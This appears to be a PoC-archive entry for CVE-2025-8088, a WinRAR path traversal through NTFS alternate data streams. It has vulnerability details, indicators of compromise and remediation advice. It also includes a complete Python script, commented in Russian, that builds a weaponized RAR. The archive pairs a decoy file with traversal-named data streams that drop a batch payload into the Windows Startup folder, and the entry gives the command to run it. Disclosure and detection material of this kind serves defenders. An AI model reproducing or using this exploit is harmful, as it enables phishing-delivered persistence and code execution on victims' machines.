PoC Archive PoC Archive
High CVE-2025-8088 patched

WinRAR Windows Path Traversal via NTFS Alternate Data Streams (CVE-2025-8088)

by ESET (discovery/analysis); pexlexity (PoC) · 2026-07-01

CVSS 8.4/10
Severity
High
CVE
CVE-2025-8088
Category
misc
Affected product
WinRAR (Windows)
Affected versions
Prior to WinRAR 7.13
Disclosed
2026-07-01
Patch status
patched

Metadata

FieldValue
Date Added2026-07-01
Last Updated2025-07
Author / ResearcherESET (discovery/analysis); pexlexity (PoC)
CVE / AdvisoryCVE-2025-8088
Categorymisc
SeverityHigh
CVSS Score8.4 (CVSSv3)
StatusWeaponized
Tagspath-traversal, WinRAR, NTFS, Alternate-Data-Streams, RomCom, Storm-0978, persistence, startup-folder, in-the-wild
RelatedCVE-2025-6218

Affected Target

FieldValue
Software / SystemWinRAR (Windows)
Versions AffectedPrior to WinRAR 7.13
Language / PlatformPython (PoC generator)
Authentication RequiredNo (victim must open/extract the crafted archive)
Network Access RequiredNo (local file processing; delivered via phishing/decoy document)

Summary

CVE-2025-8088 is a path traversal vulnerability in the Windows version of WinRAR. A specially crafted RAR archive abuses NTFS Alternate Data Streams (ADS) combined with ..\ traversal sequences so that, when opened or extracted by a vulnerable WinRAR build, files are written outside the intended extraction directory. Reported real-world exploitation (attributed to RomCom / Storm-0978) used decoy documents visible to the victim while hidden ADS-backed entries dropped attacker-controlled files into sensitive locations such as the Windows Startup folder, enabling follow-on execution of LNK, HTA, VBScript, or PowerShell loaders on next login. This is a distinct vulnerability from the earlier CVE-2025-6218 WinRAR path-traversal bug already in this archive. Patched in WinRAR 7.13 (July 2025).


Vulnerability Details

Root Cause

WinRAR’s Windows extraction logic does not fully sanitize NTFS Alternate Data Stream names combined with relative path traversal sequences (..\) embedded in archive entry filenames, allowing extraction to write outside the target directory.

Attack Vector

  1. Attacker crafts a RAR archive containing a decoy document (visible to the victim) plus one or more ADS-backed entries using traversal sequences.
  2. Victim opens/extracts the archive with a vulnerable WinRAR build.
  3. WinRAR writes the hidden payload to an attacker-chosen path outside the extraction directory (e.g., the Startup folder).
  4. Payload executes automatically on next user login, achieving persistence and code execution.

Impact

Arbitrary file write on the victim’s Windows filesystem, commonly leveraged for persistence and eventual code execution via auto-run locations.


Environment / Lab Setup

Target:   Windows host with WinRAR < 7.13 installed
Attacker: Python 3

Proof of Concept

PoC Script

See poc.py in this folder.

1
python poc.py --decoy resume.txt --payload evil.bat --out exploit.rar

Crafts a .rar archive combining a visible decoy document with an ADS + ..\ traversal entry that, when extracted by a vulnerable WinRAR build, drops the payload into the Windows Startup folder for persistence.


Detection & Indicators of Compromise

Signs of compromise:

  • New LNK/HTA/VBS/PS1 files in the Startup folder shortly after opening an email attachment/archive
  • Phishing emails with RAR attachments containing a plausible decoy document
  • Endpoint telemetry showing WinRAR.exe writing files outside the user-selected extraction path

Remediation

ActionDetail
Primary fixUpgrade to WinRAR 7.13 or later
MitigationRestrict/monitor write access to auto-run locations (Startup folder, Run keys)
User awarenessTreat unsolicited RAR attachments, even with plausible decoy content, as suspicious

References


Notes

Auto-ingested from https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC on 2026-07-01. This CVE has an unusually large number of independent public PoC repositories (25+), indicating the bug is trivial to reproduce; pexlexity was selected as a clean, minimal, verified reference implementation. Not to be confused with CVE-2025-6218 (a different WinRAR path-traversal bug already tracked in this archive).

poc.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import argparse
import os
import subprocess
import sys

def create_ads(decoy_file, stream_name, payload_data):
    """Создает ADS с указанным именем и данными."""
    ads_path = f"{decoy_file}:{stream_name}"
    with open(ads_path, 'wb') as f:
        f.write(payload_data)

def main():
    parser = argparse.ArgumentParser(description="PoC для CVE-2025-8088: Создание вредоносного RAR с path traversal через ADS.")
    parser.add_argument('--decoy', required=True, help="Путь к файлу-приманке (создастся, если не существует).")
    parser.add_argument('--payload', required=True, help="Путь к файлу с payload (BAT или EXE).")
    parser.add_argument('--out', default="malicious.rar", help="Имя выходного RAR-архива.")
    parser.add_argument('--max_up', type=int, default=20, help="Максимальное количество уровней traversal (..).")
    parser.add_argument('--target_path', default=r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\malware.bat", help="Целевой путь для payload относительно root.")

    args = parser.parse_args()

    # Проверка файлов
    if not os.path.exists(args.payload):
        sys.exit(f"Payload файл не найден: {args.payload}")
    
    with open(args.payload, 'rb') as f:
        payload_data = f.read()

    # Создание decoy, если не существует
    if not os.path.exists(args.decoy):
        with open(args.decoy, 'w') as f:
            f.write("Это файл-приманка.\n")

    # Добавление ADS с traversal
    for level in range(1, args.max_up + 1):
        traversal = '..\\' * level
        stream_name = f"{traversal}{args.target_path}"
        create_ads(args.decoy, stream_name, payload_data)
        print(f"Добавлен ADS: {stream_name}")

    # Создание RAR-архива с помощью rar.exe
    try:
        subprocess.check_call(["rar", "a", "-m5", args.out, args.decoy])
        print(f"Создан вредоносный архив: {args.out}")
    except FileNotFoundError:
        sys.exit("rar.exe не найден в PATH. Установите WinRAR и добавьте в PATH.")
    except subprocess.CalledProcessError as e:
        sys.exit(f"Ошибка создания архива: {e}")

if __name__ == "__main__":
    main()